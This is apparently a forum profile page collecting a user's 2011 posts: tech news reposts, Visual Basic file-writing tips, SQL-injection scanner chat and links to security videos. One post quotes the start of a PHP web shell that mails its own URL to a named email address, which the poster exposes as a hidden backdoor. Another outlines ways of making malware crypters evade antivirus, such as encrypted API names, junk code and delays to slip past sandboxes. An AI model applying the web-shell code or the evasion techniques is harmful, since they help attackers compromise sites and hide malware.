Everything posted by Nytro
-
Block Autorun Malware with BitDefender USB Immunizer
27 April 2011

A low-footprint tool to protect both your USB stick and your computer

For years, Autorun-based malware has been atop the worldwide e-threat landscape, with notorious representatives such as Trojan.AutorunInf, the Conficker worm (Win32.Worm.Downadup), Worm.Autorun.VHD or the fearsome Stuxnet. The Autorun feature dates back to the Windows® XP® era, when it was first introduced to facilitate software installations from CD-ROM media for non-technical computer users. This feature has quickly become the cyber-criminals’ tool of choice to automatically execute malware located on infected USB drives.

The USB Immunizer – You’re just two clicks away from full protection against Autorun-based e-threats

Since early 2009, malware exploiting the Autorun technology in order to subsequently infect other computers via flash disks has significantly increased. Trojan.AutorunINF has been the world’s number one e-threat since the second half of 2009, while the other two representatives of the Autorun family – Worm.Autorun.VHG and Trojan.Autorun.AET – are constantly present in the global Top 10 malware tops.

The evolution of autorun-based malware displayed in percentage points of infection

The BitDefender USB Immunizer is our response to this growing issue. Divided into two sections, this small utility is able to protect both your storage device and your computer.

The Immunize option allows you to immunize your USB storage device or SD card against infections with autorun-based malware. Even if your storage device has been plugged into an infected computer, the piece of malware will be unable to create its autorun.inf file, thus annihilating any chance of auto-launching itself.

The Immunize Computer slider allows you to toggle the Autorun feature On or Off for any removable media (except for CD/DVD-ROM devices). If you frequently read and write data from USB sticks or SD cards which do not belong to you or which haven’t been immunized yet, disabling the Autorun option may save you the unpleasant surprise of getting your computer infected without warning.

The BitDefender USB Immunizer is available for free on the product’s page located at the BitDefender Labs.

Source: Block Autorun Malware with BitDefender USB Immunizer - MalwareCity : Computer Security Blog
-
A new phone from HTC: Doubleshot, with Android Gingerbread and a QWERTY keyboard
by Cristina Enescu | 27 April 2011

The HTC Doubleshot name entered the rumor mill a few days ago, when an HTC employee uploaded a picture to the photo-sharing site Picasa. The speculation about the existence of the new HTC phone was generated by the information in the EXIF data of the posted image. According to this data, HTC is working on a phone with a QWERTY keyboard, running Android 2.3 Gingerbread. Most likely the HTC Doubleshot will have a 1.2GHz dual-core processor and a large screen, most likely 4 inches, with a resolution of 480x800. Other specifications include 802.11 b/g/n connectivity and Bluetooth 3.0.

No other information is known, although some sources claim that the Doubleshot name refers to dual cameras, whose purpose is recording stereoscopic 3D images. Hints of a 6MP camera with HDR capabilities have also been discovered. Unfortunately there are no images of the device available, but it will most likely have a design similar to the Desire Z.
-
Spotlight on Linux: Toorox
Apr 26, 2011 By Susan Linton

Toorox is a Gentoo-based installable live CD that features your choice of KDE or GNOME desktops. It comes with lots of useful applications including system configuration tools, easy package management, and proprietary code installers.

Toorox is sometimes compared to another Gentoo-based distribution, Sabayon. This comparison may be legitimate on the surface, but differences emerge when looking deeper. Sabayon is indeed based on Gentoo as Toorox is, but Sabayon is primarily a binary distribution. Package installation almost always involves installing binary Sabayon packages. While this is convenient and often preferred, Toorox compiles and installs software from Gentoo sources. Toorox begins life on your computer as a binary installation with all its advantages, such as fast, easy, and ready at boot, but subsequent package installation compiles source packages. So Toorox is perfect for users that would like a source-based distribution, but don't want the initial time and effort investment. Either over time or with an all-at-once effort, one can fairly easily transform Toorox to a full source install.

Toorox lists some of their software in an introduction that appears when the desktop starts. These include:

- Kernel 2.6.37-gentoo
- KDE 4.6.0
- Xorg-Server 1.9.4
- LibreOffice 3.3.1
- IceCat 3.6.13
- Thunderbird 3.1.7
- K3b 2.0.2
- Gimp 2.6.11
- Wine 1.3.14
- VLC 1.1.7
- Amarok 2.4.0
- Audacious 2.4.3
- Ardour 2.8.7
- Kino 1.3.3
- Cinelerra 20101104

Toorox includes two graphical Portage front-ends: Potato and Porthole. Of course, users can use Portage at the command line just as in Gentoo. In any case, there's plenty of software available to install. In addition, users may wish to install NVIDIA or ATI proprietary drivers. In the Systemconfig are the utilities that will install those. Users may also install Flash and multimedia libraries with the provided scripts.

Like other Gentoo-based systems, Toorox suffered through growing pains and initial failings. But also like Sabayon, it's shown great improvement over the years and now gives users a stable and enjoyable experience.

The hard drive install is a simple procedure, asking only a few questions. It does offer one bootloader option rarely seen. It offers the usual choices of installing on the MBR or root partition, but it also allows users to add Toorox to an existing bootloader list. To use that option, one merely ticks the partition that contains the bootloader menu.

Toorox routinely comes in KDE and GNOME versions for 32-bit or 64-bit systems. The basic look and feel have been updated a bit in the newest releases, but overall it still retains the Toorox personality. This is usually formed from a black to white gradient background embossed with the Toorox logo with dark panels and desktop widgets. The latest wallpaper features a multicolor design surrounding the Toorox logo and the machine architecture. Stable version 2.2011 was released February 27 and developmental release 3.2011 was released March 30.

Toorox is a great choice for those who wish a bit more control over their machine or would like an introduction to Gentoo with a little less pain. Some may say Toorox isn't ideal for new users, but that depends on the user really. In between the vast work of Gentoo and the ease of Sabayon comes Toorox. Give it a try.

Source: Spotlight on Linux: Toorox | Linux Journal
-
Do it like this, it probably doesn't let you use those characters in file names:

Open "F:\" & Day(Now()) & "-" & Month(Now()) & "-" & Year(Now()) & ".txt" For Append As #1
Print #1, "Test"
Close #1

And you also have the Hour, Minute and Second functions, so you can format it however you want.
-
Open "D:\" & Now() & ".txt" For Append As #1 ?
-
Yes, but if something nice and elegant comes out of it, you can sell it and earn some money. You could add an option for editing HTTP headers, and if it were multithreaded too it would be perfect... And you learn a lot of new things when you work on a more complex project.
-
Hmm, so it can also detect possible Blind SQL Injection? You could use several "vectors", to try several things on the same link. You can sniff Acunetix to see what methods it uses and take inspiration from it.
-
Yes, I figured this could be done. But it seems to me aimed at those script kiddies who want to find vulnerabilities in a site, and it doesn't matter which site, as long as it's a site, so they have something to brag about. It doesn't look bad, it's probably error-based. And congratulations if you made it yourself.
-
Yes, interesting, but the basic idea is stupid. I want to find SQL Injection in site "x"; what good does it do me to find Vasile's site vulnerable, using a dork?
-
I didn't watch this crappy show, but I saw a few clips on YouTube, and this one really isn't worth it.
-
Open "D:\Fisier.txt" For Append As #1
Print #1, Text1.Text
Close #1
-
She gave me a picture of herself, she's cute.
-
Or it could be a girl. It's not impossible for girls to come here too.
-
What it used to do, rather. In short: it "transforms" a detectable executable into an undetectable one.
-
Security and Data Protection in a Google Data Center

Not exactly a tutorial, but there are some interesting things in it.
Duration: 07:01 (I think you can find 7 minutes to watch it)
Youtube: http://www.youtube.com/watch?v=1SCZzgfdTBo&feature=player_embedded
-
Yeah, right, you leave and the foreigners jump at you with money... As soon as you get there they'll beg you to take their money, because... ? I don't know, you know. What do you think there is abroad? There's nothing: no family, no relatives, no friends, nobody cares about you. At home, if you have a problem, you have someone to turn to. There you're on your own. I don't think it's exactly paradise... Do you think money falls from the sky? Do you even think?
-
Permanent ban. Infection.
-
Malware Analysis: Rootkits (Video)

Good video explaining rootkits using hxdef.

Part 1: http://video.google.com/videoplay?docid=-1098574092821901542&q=source:015021726083819226340&hl=en
Part 2: http://video.google.com/videoplay?docid=4452554918423531934&q=source:015021726083819226340&hl=en
Part 3: http://video.google.com/videoplay?docid=-1835297762554988848&q=source:015021726083819226340&hl=en

Source: http://www.hackhound.org/forum/index.php?/tutorials/article/244-malware-analysis-rootkits-video/
-
PHP Security

This tutorial covers Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL Injection, globals, and much more!

Video (46:42): http://videos.code2design.com/video/play/PHP/11
-
It's probably the magical j1c0. I think you came here just to fool around and I don't think you'll last long while I'm around.
-
Windows 8: Advanced Task Manager revealed
by Bianca Dinu | 21 April 2011

The latest Windows 8 build in developers' hands has led to a new series of screenshots, which this time reveal the operating system's new Advanced Task Manager. The two screenshots seem to show two different types of manager, one optimized for the touch edition and the other standard.

The first image reveals the application's dashboard, which gives users much more information about the running processes, services and system resources. Processes are now listed in a colored interface, which lets the user see which of them load the system the most.

The second screenshot represents another version of the Task Manager, with a strong touch-friendly emphasis, which shows a list of programs, users and start-up items.

The latest Windows 8 screenshots add to a long series of leaks that have revealed several essential features of the platform to fans. And since there is still a lot to find out, stay tuned for new Windows 8 details.

Source: http://www.hit.ro/software/Windows-8-Advanced-Task-Manager-ul-dezvaluit
-
The file in that archive starts like this:

<?php
# Web Shell by oRb
$eu=1;
while ($eu==1){
$url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
mail ("yo_cristy_lov3_boy@yahoo.com","shell",$url);
$eu++;
}

Meaning (leaving aside the stupidity of that while) it sends an email with this shell's link to: yo_cristy_lov3_boy

That is, not to me but to some chav.

PS: I am totally against spam.
-
If you don't really know VB, how do you plan to modify the existing code? There are various ways to make a crypter undetectable: the way in which the APIs needed to run the executable in memory are called, classic or dynamic. With dynamic you can encrypt the names of the called functions, but it doesn't help much. Useless code can be added to avoid certain signatures for certain regions of code. A small delay can be put on the program's execution to get past the antivirus sandbox. There are many things that have to be taken into account, and it's not easy at all.
-
Jokes

A Romanian broke the European Space Agency's servers. While he was cleaning, he hit them with the broom handle.

On a Facebook page.
-
Reverse Code Engineering: An In-Depth Analysis of the Bagle Virus
Author: Konstantin Rozinov

1. INTRODUCTION
2. BASIC X86 CONCEPTS
2.1. REGISTERS
2.2. ASSEMBLY
2.3. RUNTIME DATA STRUCTURES
2.4. THE STACK
3. VIRUS OVERVIEW
3.1. VIRUS HISTORY
3.2. VIRUS TYPES
4. BAGLE VIRUS DISASSEMBLY
4.1. OVERVIEW
4.2. ANALYSIS RESOURCES
4.3. DISASSEMBLY APPROACH
4.4. ANALYSIS PROBLEMS AND SOLUTIONS
4.5. FUNCTIONAL FLOW
5. CONCLUSIONS
APPENDIX A: DETAILED DISASSEMBLY OF BAGLE VIRUS
APPENDIX B: SOURCE CODE LISTING OF BAGLE VIRUS

Download: http://www.binary-auditing.com/downloads/011%20-%20malware%20analysis/3%20Bagle%20A%20Virus/bagle_analysis_v.1.0.pdf
-